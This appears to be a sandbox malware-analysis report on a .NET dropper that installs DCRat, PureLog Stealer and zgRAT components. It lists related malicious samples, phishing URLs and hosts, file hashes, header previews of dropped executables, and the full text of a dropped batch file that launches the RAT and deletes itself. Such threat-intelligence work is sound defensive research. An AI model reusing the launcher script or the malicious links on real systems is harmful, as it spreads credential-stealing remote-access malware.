	https://www.freelancer.com/users/login-quick.php?token=02fff9bf9f8b7efe683f539f10a258726ae01239eb8f0b9b57526578d393fc63&url=https%3A%2F%2Fwww.google.com.bn%2Furl%3Ffnc%3Da9XTEoexMBpyPYn99soX%26ndp%3Dm6lKEDZMuBIQeZn7RBkX%26sa%3Dt%26pfuv%3DBY2IJKbokHGBEdfDSRyz%26ncbe%3DtA02sXUJ4dkStFSKl5Bg%26db%3DoBemf3zEg5VOxgJRxd3H%26fg%3DSSndprYXntqQtLjEHziw%26url%3Damp%252Ffileshareinfoviewnow.s3-website.us-east-2.amazonaws.com&user_id=1719536768&uniqid=76018695-412152-662ef280-88c3b518&linkid=6	Get hash	malicious	Unknown	Browse	104.17.25.14
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Nymaim, Stealc, Vidar	Browse	104.21.16.9
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.165.166
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.165.166
	Halkbank_Ekstre_2024123_081142_787116.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.67.152
	http://displaysolution.ca	Get hash	malicious	Unknown	Browse	104.21.79.176
CLOUDFLARENETUS	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.9
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.165.166
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.165.166
	https://es.ineffable9.com/7GbZu6Idv_m2at7xgNmWkk/	Get hash	malicious	Unknown	Browse	172.67.182.170
	https://www.freelancer.com/users/login-quick.php?token=02fff9bf9f8b7efe683f539f10a258726ae01239eb8f0b9b57526578d393fc63&url=https%3A%2F%2Fwww.google.com.bn%2Furl%3Ffnc%3Da9XTEoexMBpyPYn99soX%26ndp%3Dm6lKEDZMuBIQeZn7RBkX%26sa%3Dt%26pfuv%3DBY2IJKbokHGBEdfDSRyz%26ncbe%3DtA02sXUJ4dkStFSKl5Bg%26db%3DoBemf3zEg5VOxgJRxd3H%26fg%3DSSndprYXntqQtLjEHziw%26url%3Damp%252Ffileshareinfoviewnow.s3-website.us-east-2.amazonaws.com&user_id=1719536768&uniqid=76018695-412152-662ef280-88c3b518&linkid=6	Get hash	malicious	Unknown	Browse	104.17.25.14
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Nymaim, Stealc, Vidar	Browse	104.21.16.9
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.165.166
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.165.166
	Halkbank_Ekstre_2024123_081142_787116.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.67.152
	http://displaysolution.ca	Get hash	malicious	Unknown	Browse	104.21.79.176

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\Desktop\DWhAaqcM.log	Qsi7IgkrWa.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	qNdO4D18CF.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	4Awb1u1GcJ.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	LzmJLVB41K.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	s5duotgoYD.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	QMT2731i8k.exe	Get hash	malicious	DCRat	Browse
	EQdhBjQw4G.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	3AAyq819Vy.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	TGh6AUbQkh.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	k1iZHyRK6K.exe	Get hash	malicious	DCRat	Browse

Created / dropped Files

C:\Recovery\3dcb0eb9430f8d

Download File

Process:	C:\webCrt\Surrogatedll.exe
File Type:	ASCII text, with very long lines (478), with no line terminators
Category:	dropped
Size (bytes):	478
Entropy (8bit):	5.879039996402439
Encrypted:	false
SSDEEP:	12:OHZ9X4Tb1li4eJpWLb3z2WORfVTDVp51+6D8eGw:Unoj0pWLb3bO5f9DD8k
MD5:	AC64111AC175CB41676CF7AF0206577E
SHA1:	EA0DC9F5EC5D3903BB00F5C41F687D78E3AD3495
SHA-256:	C1AAEE5C7D2E0E3CA9CA7FE779FE427D86D8615E662EC7FF856652B4B988591E
SHA-512:	8A9297A02A69B402C66322172C5659DDFD21ABCDDC86DFF0A74174E9A8F5E5CA0809C91A9ED4923A3E4CFA118864BB8FE895B89576AF78FB15D1B8DC75229367
Malicious:	false
Reputation:	low
Preview:	OpCd4AhAUNY6UV6k5btJ3F5gyH9dWeacdVwtgoLSEGDmpVesPk97qvkJugpwADozw6c8jMERPbFwBS1cnROvecwsvm9A9ZRAcO0t3gJCgsrPqxIboMJty3UTKuN6NES0JEUwcIjGHMPwugB8diVwPiLi3gjJSMyba1FlcV8gmClmniinsPcptfkl2v26jay5YxV3aafHjyJN6j5V75aDtIs4QesqdB7MOqNzMpMStUF5VXpT0h9n9uMPFbn6ryoi079QVFIRsITYDwi2zZz5CUNde8uvCQl5qhEYYY7vZr41bxLS2uGR8tggtfwWUWPbhYsfsJeacEfUZWCqwb3RKT66Bip2mkaCbcTCFqksQqz4NLGXdFk3d7RNcveJelx1nd26C9lG1KBdeBtzbRZhAhjdKGkTLaNo27RuSJVeedBT6ytaCprNLP1F3Yv5YR5a6Xkgu8gS55DgfQhWXKRfsAcnGL03Xa

C:\Recovery\EeMFgDHDyZvTl.exe

Download File

Process:	C:\webCrt\Surrogatedll.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1918976
Entropy (8bit):	7.538029979348699
Encrypted:	false
SSDEEP:	49152:0Dqxm2S5zNBeo3O4KzS5eBtXLyS/DSH36dc:0D2gT3OhweBdyS/uX
MD5:	9FC3AB56804D6BA50E840846783E8AC1
SHA1:	ED6D70605EBE68934004C571A7F503B1432FEB77
SHA-256:	13E5168099CA33F17C96A1F842DED5E99555D0AEFED8E4F8EFEF96FBDCAC7BBA
SHA-512:	593BBD2AC3D0AC8A445D7CC7214E5F1A8AED2120AB098CBEA2E3120A901480E707B45300A81E0E699A82342E516AFF31C70026406B48D428D1A82E4D25DB5DE9
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\EeMFgDHDyZvTl.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\EeMFgDHDyZvTl.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 63%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....=g.................@..........>^... ...`....@.. ....................................@..................................]..K....`.. ............................................................................ ............... ..H............text...D>... ...@.................. ..`.rsrc... ....`.......B..............@....reloc...............F..............@..B................ ^......H...........L...............u..h].......................................0..........(.... ........8........E........q...)...M...8....(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8z......0.......... ........8........E............P...........\...o...8....~....(Q... .... .... ....s....~....(U....... ....~....{....:....& ....8....r...ps....z8.... ........8l...~....9.... ........8T......... ....~....{....9>...& ....83...8

C:\Users\Public\Pictures\3dcb0eb9430f8d

Download File

Process:	C:\webCrt\Surrogatedll.exe
File Type:	ASCII text, with very long lines (742), with no line terminators
Category:	dropped
Size (bytes):	742
Entropy (8bit):	5.896652230435702
Encrypted:	false
SSDEEP:	12:0NQ/gwk9C0XR2gKP2zkoyWgIARjWX+SOOxp4b76ekT3ZyxBZINYC0Ydj0hzUwTzV:0QBk9CaZptyWK0+pkmyewU9gdj0hzUKJ
MD5:	9A4F22EEC3D675CD3AEA5C5291340A7B
SHA1:	07865B6C79FF8680E6D0F8220FF56D9BBD2A75B3
SHA-256:	ABD5C32047B93CAF883633F93A5E1DD3D9BEFEA4A034EAE83C205CBF62891934
SHA-512:	6BE0A4EBA5F0E604331E5C2CB430BE814E1BFD46400C1DD175095C6CADE97A4412BF1FCB260E090AEA3744133B62A71C981737E25474F0678F860219B73C47C5
Malicious:	false
Preview:	V0Oh5xc6MFyFdlQqk5feSqNNi7mQGzWCgtYdS58qeLqqgg2sj626z4bpmA97LM0WsvjuMwXo6y9H9hqCF3qJ7aMlSs0S5BfSVT7v6IfxjNAA4UpFT72RgqZSi8bd5Fs5Trwqj5F7Y2ktZLq8Dv88IOvo3oM8qB1deErNi9fY152nGq2WRdaKGuwF5Hx4tHQXBGOUedZEPkGNVIiMvzqNkqWuSmRaMkouofl9ci2yDW5goitxjkI3aDwUtdC1L91o5VjzgiuN72JNv0Gu2e1mbvUlsRP8fAnEeQlS84QAz55i4ij3XS8qIPMJB8GPTvr6PEtfPxv8O0wgzwrJsWkNB66ODbQAxBqDN9SzzDojgAcRdpTPR7h7Le4SIebyhuLNJsT0d1UosBrBeovXHBt0dt2tEAqVmzCwyPHuWdvZm2PJx2ydsEqfBVta0kvcL8C294NOhBBnPUNkes6MLMmiJgvdfr3vrSNo0XK2pj6rCDQqII5HojR9VescJut0HP56GiuHiDgmQ5fGQEUWvwHIBOSWoss50FkwHTkjYyjkCosa8mMFZWEUIx41QXc0VlwKUs86dv87NgFXg1XBfnfdAPoTZsSAVsPb2hGQnPloXHHmrhVZAbUrFSJEEphvc7leQoe8vHYPC1F3ICm1W3A4YiWkYBM8szLafnVDDXo3CEpNMQ6BCpYi7rFsS4jt4ZhMppXfqjy8PG1U2IXHFK5CbncyhmuIx48nhchg3a

C:\Users\Public\Pictures\EeMFgDHDyZvTl.exe

Download File

Process:	C:\webCrt\Surrogatedll.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1918976
Entropy (8bit):	7.538029979348699
Encrypted:	false
SSDEEP:	49152:0Dqxm2S5zNBeo3O4KzS5eBtXLyS/DSH36dc:0D2gT3OhweBdyS/uX
MD5:	9FC3AB56804D6BA50E840846783E8AC1
SHA1:	ED6D70605EBE68934004C571A7F503B1432FEB77
SHA-256:	13E5168099CA33F17C96A1F842DED5E99555D0AEFED8E4F8EFEF96FBDCAC7BBA
SHA-512:	593BBD2AC3D0AC8A445D7CC7214E5F1A8AED2120AB098CBEA2E3120A901480E707B45300A81E0E699A82342E516AFF31C70026406B48D428D1A82E4D25DB5DE9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 63%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....=g.................@..........>^... ...`....@.. ....................................@..................................]..K....`.. ............................................................................ ............... ..H............text...D>... ...@.................. ..`.rsrc... ....`.......B..............@....reloc...............F..............@..B................ ^......H...........L...............u..h].......................................0..........(.... ........8........E........q...)...M...8....(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8z......0.......... ........8........E............P...........\...o...8....~....(Q... .... .... ....s....~....(U....... ....~....{....:....& ....8....r...ps....z8.... ........8l...~....9.... ........8T......... ....~....{....9>...& ....83...8

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Surrogatedll.exe.log

Download File

Process:	C:\webCrt\Surrogatedll.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	1179
Entropy (8bit):	5.354252320228764
Encrypted:	false
SSDEEP:	24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNrJE4qtE4KlOU4mM:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHK2
MD5:	074445AD437DEED8A22F11A846280CE2
SHA1:	23025D83D7C33396A5F736FC6F9945976CFCD5D1
SHA-256:	B7FD27029E12BE3B5C2C4010CC9C9BCB77CFE44852CC6EF4C3CED70740BB1CFD
SHA-512:	440F8E77340A5C2F64BF97BC712193145F03AEDB86C0F5C849CA1AD0190E5621DDD7AE8104862383E31FFEC49CCF483CF2E4533C501B2606EE1D0FE66E865B6D
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr

C:\Users\user\AppData\Local\Temp\8438IKeNWT.bat

Download File

Process:	C:\webCrt\Surrogatedll.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	160
Entropy (8bit):	5.3060251192947705
Encrypted:	false
SSDEEP:	3:mKDDVNGvTVLuVFcROr+jn9m73OcdIvBktKcKZG1N+E2J5xAIguuzzKn:hCRLuVFOOr+DE73zdIvKOZG1N723fgu9
MD5:	EBB74E8C48EF3CDBBBE6B20A1989EF73
SHA1:	3B260450CF24B95EF135A8E06A27E202EFA29237
SHA-256:	4EFB428EFF2F3C159A63916EF3B25F01EC02CB8C61A24727E0E79B752F39CA0C
SHA-512:	BE437EFD811BC0D181B2BB4D9CDDB951AACD4C3E9D0567F7A97F9973AA1235DBECDF5B7FFD59690C6AF2CB4C5512C9B35C7A9B54F7CB6644083E605F754DAEF2
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Recovery\EeMFgDHDyZvTl.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\8438IKeNWT.bat"

C:\Users\user\AppData\Local\Temp\MilWjNMpDI

Download File

Process:	C:\webCrt\Surrogatedll.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.243856189774723
Encrypted:	false
SSDEEP:	3:cwOmw/AYL9:BOmwf9
MD5:	494E4C062608DEBA7D95B345D0CB6438
SHA1:	084B679ACAEA659612E755AB5381C8534E872581
SHA-256:	2ECDE92881D3CC2D3E7755DF22FC45886AA56AE79B0967A5E0BD04A5D8E7EF73
SHA-512:	00737EF4F026A794BFC0B58EBAA374206597DBFE5554D8982A5BFF38F05023C8A3CEB412050942C0770D6BC6E6E1213B087CBD7F23B1F8035C6BA00C0926A0A4
Malicious:	false
Preview:	ZSQMUkn1ZhNAZr547ZjIm4fz0

C:\Users\user\Desktop\DWhAaqcM.log

Download File

Process:	C:\webCrt\Surrogatedll.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 8%
Joe Sandbox View:	Filename: Qsi7IgkrWa.exe, Detection: malicious, Browse Filename: qNdO4D18CF.exe, Detection: malicious, Browse Filename: 4Awb1u1GcJ.exe, Detection: malicious, Browse Filename: LzmJLVB41K.exe, Detection: malicious, Browse Filename: s5duotgoYD.exe, Detection: malicious, Browse Filename: QMT2731i8k.exe, Detection: malicious, Browse Filename: EQdhBjQw4G.exe, Detection: malicious, Browse Filename: 3AAyq819Vy.exe, Detection: malicious, Browse Filename: TGh6AUbQkh.exe, Detection: malicious, Browse Filename: k1iZHyRK6K.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\IPdRdIgb.log

Download File

Process:	C:\Recovery\EeMFgDHDyZvTl.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\KCOiojdz.log

Download File

Process:	C:\webCrt\Surrogatedll.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\RyxhNllI.log

Download File

Process:	C:\Recovery\EeMFgDHDyZvTl.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\eMRvdFMJ.log

Download File

Process:	C:\webCrt\Surrogatedll.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\hACmhobX.log

Download File

Process:	C:\Recovery\EeMFgDHDyZvTl.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\nukLNhSq.log

Download File

Process:	C:\webCrt\Surrogatedll.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\rrFUvAHK.log

Download File

Process:	C:\Recovery\EeMFgDHDyZvTl.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Windows\Cursors\3dcb0eb9430f8d

Download File

Process:	C:\webCrt\Surrogatedll.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	113
Entropy (8bit):	5.639442873896943
Encrypted:	false
SSDEEP:	3:mUn6/AcPDTJQlvHEWmCzZn+jzvXUn8X/ck:mUUAc3J0H/1p+jz/Jck
MD5:	339AED096F3FEDC10F637451BFC17A91
SHA1:	4454A712B9E1E7E308912123A95F72696F96E951
SHA-256:	579F28145C907441454FED29E73B1EF4BF245524CE1194B18F297C93481E4320
SHA-512:	A337A646EFF7008F3F8E57FACDA45B7FD2DBBE07EC265EBD7CC61C5757E3FC4D18C362F4DB9210BE928ACA94F8697FD2CD16D4441B6AB89B31FB01D22FA1C3D8
Malicious:	false
Preview:	bbC8sBu1NFSw3HZesquexTITHgTwfYaK2jdbELVvgWlplq4t5cL2ZySHSs0Lr7VzpI4Un8ZgV97asdrbmj1DMiuEQVJWVJDiBwAdvkG7Dpha02ZyA

C:\Windows\Cursors\EeMFgDHDyZvTl.exe

Download File

Process:	C:\webCrt\Surrogatedll.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
